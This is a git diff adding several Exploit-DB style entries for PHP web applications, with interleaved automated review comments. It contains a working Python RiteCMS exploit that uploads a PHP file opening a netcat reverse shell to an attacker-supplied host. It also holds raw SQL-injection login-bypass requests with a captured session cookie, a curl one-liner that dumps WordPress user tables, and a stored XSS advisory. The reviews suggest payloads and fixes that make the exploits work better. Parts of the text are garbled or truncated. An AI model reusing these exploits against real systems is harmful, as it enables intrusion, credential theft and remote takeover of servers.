--- /dev/null
+++ b/exploits/php/webapps/48914.txt
@@ -0,0 +1,27 @@
+# Exploit Title: User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS
+# Google Dork: N/A
+# Date: 2020-08-07
+# Exploit Author: yusufmalikul
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 2.1
+# Tested on: Windows 10
+# CVE : N/A
+
+Description
+
+User Registration & Login and User Management System With admin panel 2.1 application from PHPgurukul is vulnerable to
+Persistent XSS via the fname, lname, email, and contact field name when user register on the site then admin viewing user
+list on manage user page triggering the payload.
+
+POC
+
+User side
+1. Go to the user registration page http://localhost/loginsystem
+2. Enter in one of the field (first name, last name, email, or contact)
+3. Click sign up
+
+Admin side
+1. Login to admin panel http://localhost/loginsystem/admin
+2. After login successful it will redirect to manage user page
+3. Payload triggered
\ No newline at end of file
diff --git a/exploits/php/webapps/48915.py
new file mode 100755
index 000000000..ed1c5db09
--- /dev/null
+++ b/exploits/php/webapps/48915.py
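Review bot: The sample request includes the full `wordpress_*` and `wordpress_logged_in_*` cookie values for the `admin` account; these are live session tokens and should be redacted (`Cookie: wordpress_logged_in_<hash>=[REDACTED]`) even when captured on a lab host. The advisory says "An Authenticated User", but the upload form lives under `/wp-admin/admin.php?page=hs-brand-logo-slider.php` and the captured session belongs to `admin`, so the minimum capability the plugin's menu page requires is unstated — if it is `manage_options`, an Administrator on a single-site install can already write PHP through the plugin editor and this is a hardening issue rather than privilege escalation; state the lowest role the upload was reproduced with. The `logoupload` part is shown with `filename="eftekharr.php"` and no body, so the PoC does not show what was written; a harmless probe such as `<?php echo 'upload-ok'; ?>` is enough to demonstrate execution. Step 3 says to rename `a.jpg` to `a.php` while the "Vulnerable Code" section already shows `filename="a.php"` sent with `Content-Type: image/jpeg`; clarify that the bypass is editing the multipart `filename` in the proxy, not renaming a file on disk.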
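Review bot: Step 2 on the user side only says "Enter in one of the field" and no payload is shown, so the advisory does not establish what input passes the registration form; if the form validates `email` server-side (e.g. with `FILTER_VALIDATE_EMAIL`) most script payloads would be rejected there, so give the payload used for each of the four fields separately, e.g. `2. Enter "><svg/onload=alert(document.domain)> in the first name field`. Also name the PHP files involved (the registration handler and the admin manage-user page) or include the request/response pair, so a maintainer can locate the output that is written without `htmlspecialchars()` rather than reproducing the whole flow.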
@@ -0,0 +1,129 @@ +# Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution +# Date: 2020-07-03 +# Exploit Author: H0j3n +# Vendor Homepage: http://ritecms.com/ +# Software Link: http://sourceforge.net/projects/ritecms/files/ritecms_2.2.1.zip/download +# Version: 2.2.1 +# Tested on: Linux +# Reference: https://www.exploit-db.com/exploits/48636 + +# !/usr/bin/python +# coding=utf-8 +import requests,sys,base64,os +from colorama import Fore, Back, Style +from requests_toolbelt.multipart.encoder import MultipartEncoder +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +# Variable +CONTENT = '''
''' + +# Header +def header(): + top = cyan(''' + \t _____ _ _ _____ __ __ _____ + \t| __ \(_) | / ____| \/ |/ ____| + \t| |__) |_| |_ ___| | | \ / | (___ ___ ___ ___ + \t| _ /| | __/ _ \ | | |\/| |\___ \ _ __ |_ | |_ | < / + \t| | \ \| | || __/ |____| | | |____) | | |/ / / __/_ / __/_ / / + \t|_| \_\_|\__\___|\_____|_| |_|_____/ |___/ /____(_)____(_)_/ +''') + return top + +def info(): + top = cyan(''' +[+] IP : {0} +[+] USERNAME : {1} +[+] PASSWORD : {2} +'''.format(IP,USER,PASS)) + + return top + +# Request Function +# Color Function +def cyan(STRING): + return Style.BRIGHT+Fore.CYAN+STRING+Fore.RESET + +def red(STRING): + return Style.BRIGHT+Fore.RED+STRING+Fore.RESET + + +# Main +if __name__ == "__main__": + print header() + print "\t--------------------------------------------------------------" + print "\t| RiteCMS v2.2.1 - Authenticated Remote Code Execution |" + print "\t--------------------------------------------------------------" + print "\t| Reference : https://www.exploit-db.com/exploits/48636 |" + print "\t| By : H0j3n |" + print "\t--------------------------------------------------------------" + if len(sys.argv) == 1: + print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0]) + + print cyan("\n[-] Please Put IP & Credentials") + sys.exit(-1) + if len(sys.argv) == 2: + print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0]) + + print cyan("\n[-] Please Put Credentials") + sys.exit(-1) + if len(sys.argv) > 3: + print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0]) + + print cyan("\n[-] Only 2 arguments needed please see the usage!") + sys.exit(-1) + IP = sys.argv[1] + USER,PASS = sys.argv[2].split(":") + print info() + + URL='{0}/cms/index.php'.format(IP) + URL_UPLOAD = URL + '?mode=filemanager&action=upload&directory=media' + + HEAD = {"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"} + 
LOG_INFO = {"username" : USER, "userpw" : PASS} + try: + with requests.Session() as SESSION: + SESSION.get(URL) + SESSION.post(URL, data=LOG_INFO, headers=HEAD,allow_redirects=False) + except: + print red("[-] Check the URL!") + sys.exit(-1) + if CONTENT in str(SESSION.get(URL_UPLOAD).text): + print red("[-] Cannot Login!") + sys.exit(-1) + else: + print cyan("[+] Credentials Working!") + LHOST = str(raw_input("Enter LHOST : ")) + LPORT = str(raw_input("Enter LPORT : ")) + FILENAME = str(raw_input("Enter FileName (include.php) : ")) + PAYLOAD = "&1|nc {0} {1} >/tmp/f'); ?>".format(LHOST,LPORT) + FORM_DATA = { + 'mode': (None,'filemanager'), + 'file': (FILENAME, PAYLOAD), + 'directory': (None, 'media'), + 'file_name': (None, ''), + 'upload_mode': (None, '1'), + 'resize_xy': (None, 'x'), + 'resize': (None, '640'), + 'compression': (None, '80'), + 'thumbnail_resize_xy': (None, 'x'), + 'thumbnail_resize': (None, '150'), + 'thumbnail_compression': (None, '70'), + 'upload_file_submit': (None, 'OK - Upload file') + } + HEADER_UPLOAD = { + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Referer': URL_UPLOAD + } + response = SESSION.post(URL,files=FORM_DATA,headers=HEADER_UPLOAD) + if FILENAME in response.text: + print cyan("\n[+] File uploaded and can be found!") + else: + print red("[-] File cannot be found or use different file name!") + sys.exit(-1) + URL_GET = IP + '/media/{0}'.format(FILENAME) + OPTIONS = str(raw_input("Exploit Now (y/n)?")) + print cyan("\nW0rk1ng!!! Enjoy :)") + SESSION.get(URL_GET) \ No newline at end of file diff --git a/exploits/php/webapps/48916.txt b/exploits/php/webapps/48916.txt new file mode 100644 index 000000000..da90b20a6 --- /dev/null +++ b/exploits/php/webapps/48916.txt 
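Review bot: The `Exploit Now (y/n)?` answer is stored in `OPTIONS` but never examined, so the uploaded file is requested (and the reverse shell fired) regardless of the reply; add `if OPTIONS.strip().lower() != 'y': sys.exit(0)` before `SESSION.get(URL_GET)`. The login check `if CONTENT in str(SESSION.get(URL_UPLOAD).text)` compares against `CONTENT`, which as shown in this hunk is the empty string `'''\n'''` and therefore matches every response, making "Cannot Login!" unconditional — either the marker text is missing from the committed file or the check should instead look for a string that appears only on the authenticated file-manager page. `# !/usr/bin/python` with a space is not a shebang, and it sits on line 10 after the header comments anyway, so it documents rather than selects the interpreter; since the file uses Python 2 `print` statements and `raw_input`, state that explicitly as `# Requires Python 2 (print statement, raw_input)`. The bare `except:` around the login POST also swallows `KeyboardInterrupt` and reports it as "Check the URL!"; use `except requests.RequestException:`.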
@@ -0,0 +1,45 @@
+# Title: Mobile Shop System v1.0 - SQLi lead to authentication bypass
+# Exploit Author: Moaaz Taha (0xStorm)
+# Date: 2020-09-08
+# Vendor Homepage: https://www.sourcecodester.com/php/14412/mobile-shop-system-php-mysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14412&title=Mobile+Shop+System+in+PHP+MySQL
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
+
+# POC
+1- Go to "http://TARGET/mobileshop-master/login.php" or "http://TARGET/mobileshop-master/LoginAsAdmin.php"
+2- Inject this SQL payload (test' or 1=1 -- -) in email field and any password in password field.
+3- Click on "login", then you will bypass the authentication successfully.
+
+# Malicious HTTP POST Requests
+
+POST /mobileshop-master/login.php HTTP/1.1
+Host: 192.168.1.55:8888
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.55:8888/mobileshop-master/login.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 44
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+email=test%27+or+1%3D1+--+-&password=test123
+
+==========================================================================
+
+POST /mobileshop-master/LoginAsAdmin.php HTTP/1.1
+Host: 192.168.1.55:8888
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.55:8888/mobileshop-master/LoginAsAdmin.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 44
+Connection: close
+Cookie: PHPSESSID=d7c49f6634a208dca0624f2f6b1d27b6
+Upgrade-Insecure-Requests: 1
+
+email=test%27+or+1%3D1+--+-&password=test123
\ No newline at end of file
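Review bot: The second request block still carries a captured session identifier from the author's lab (`Cookie: PHPSESSID=d7c49f6634a208dca0624f2f6b1d27b6`) and the lab host `192.168.1.55:8888` in both `Host:` and `Referer:` lines; these are test-environment residue, and a curated entry should drop the cookie line and use the same `TARGET` placeholder the POC section already uses. The advisory also stops at the bypass and gives no remediation, so a reader assessing exposure has nothing to verify against; a closing line such as `# Fix: pass the email and password values as bound parameters of a prepared statement rather than concatenating them into the login query` would close that gap, with the caveat that the vulnerable statement itself is not shown here and its location in login.php / LoginAsAdmin.php is inferred from the endpoints named.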
diff --git a/exploits/php/webapps/48918.sh b/exploits/php/webapps/48918.sh
new file mode 100755
index 000000000..6d483f528
--- /dev/null
+++ b/exploits/php/webapps/48918.sh
@@ -0,0 +1,17 @@
+# Exploit Title: WordPress Rest Google Maps Plugin SQL Injection
+# Google Dork: inurl:index.php?rest_route=3D/wpgmza/
+# Date: 2020-09-09
+# Exploit Author: Jonatas Fil
+# Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers
+# Software Link: https://wordpress.org/plugins/wp-google-maps/
+# Version: < 7.11.18
+# Tested on: Linux
+# CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-2019-10692)
+#!/bin/bash
+
+TARGET="192.168.1.77"
+
+curl -k --silent
+"http://$TARGET/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=
+fields=3D*+from+wp_users+--+-"
+| jq
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a1b83a21d..ba10c71d9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
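Review bot: The `#!/bin/bash` directive sits on line 10 of the new file, below the nine `# Exploit Title:` … `# CVE :` comment lines, so it is inert: a shebang is only honoured on line 1, and the file (committed mode 100755) would otherwise run under whatever shell the caller happens to use. The directive should be the first line, with the header block beneath it. The body also shows quoted-printable residue that survived import — `=3D` in the Google Dork, CVE and curl lines, and the soft line break `=` closing the second `curl` argument line — which indicates the archived copy came from an encoded e-mail body rather than the original attachment and does not match what the author submitted; it should be re-imported from the source, not patched by hand, so the CVE reference URL in the comment is also restored.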
@@ -40726,6 +40726,18 @@ id,file,description,date,author,type,platform,port
 48905,exploits/php/webapps/48905.txt,"Hostel Management System 2.1 - Cross Site Scripting (Multiple Fields)",2020-10-19,Kokn3t,webapps,php,
 48906,exploits/php/webapps/48906.py,"Typesetter CMS 5.1 - Arbitrary Code Execution (Authenticated)",2020-10-19,"Rodolfo Tavares",webapps,php,
 48907,exploits/php/webapps/48907.txt,"Textpattern CMS 4.6.2 - Cross-site Request Forgery",2020-10-19,"Alperen Ergel",webapps,php,
+48908,exploits/hardware/webapps/48908.py,"Comtrend AR-5387un router - Persistent XSS (Authenticated)",2020-10-20,OscarAkaElvis,webapps,hardware,
+48909,exploits/php/webapps/48909.txt,"Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)",2020-10-20,"Akıner Kısa",webapps,php,
+48910,exploits/php/webapps/48910.txt,"Wordpress Plugin WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure",2020-10-20,redtimmysec,webapps,php,
+48911,exploits/php/webapps/48911.txt,"Visitor Management System in PHP 1.0 - SQL Injection (Authenticated)",2020-10-20,"Rahul Ramkumar",webapps,php,
+48912,exploits/php/webapps/48912.py,"Ultimate Project Manager CRM PRO Version 2.0.5 - SQLi (Authenticated)",2020-10-20,nag0mez,webapps,php,
+48913,exploits/php/webapps/48913.txt,"WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload",2020-10-20,Net-Hunter,webapps,php,
+48914,exploits/php/webapps/48914.txt,"User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS",2020-10-20,yusufmalikul,webapps,php,
+48915,exploits/php/webapps/48915.py,"RiteCMS 2.2.1 - Remote Code Execution (Authenticated)",2020-10-20,H0j3n,webapps,php,
+48916,exploits/php/webapps/48916.txt,"Mobile Shop System v1.0 - SQL Injection Authentication Bypass",2020-10-20,"Moaaz Taha",webapps,php,
+48917,exploits/java/webapps/48917.py,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution",2020-10-20,"Jonatas Fil",webapps,java,
+48918,exploits/php/webapps/48918.sh,"WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection",2020-10-20,"Jonatas Fil",webapps,php,
+48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,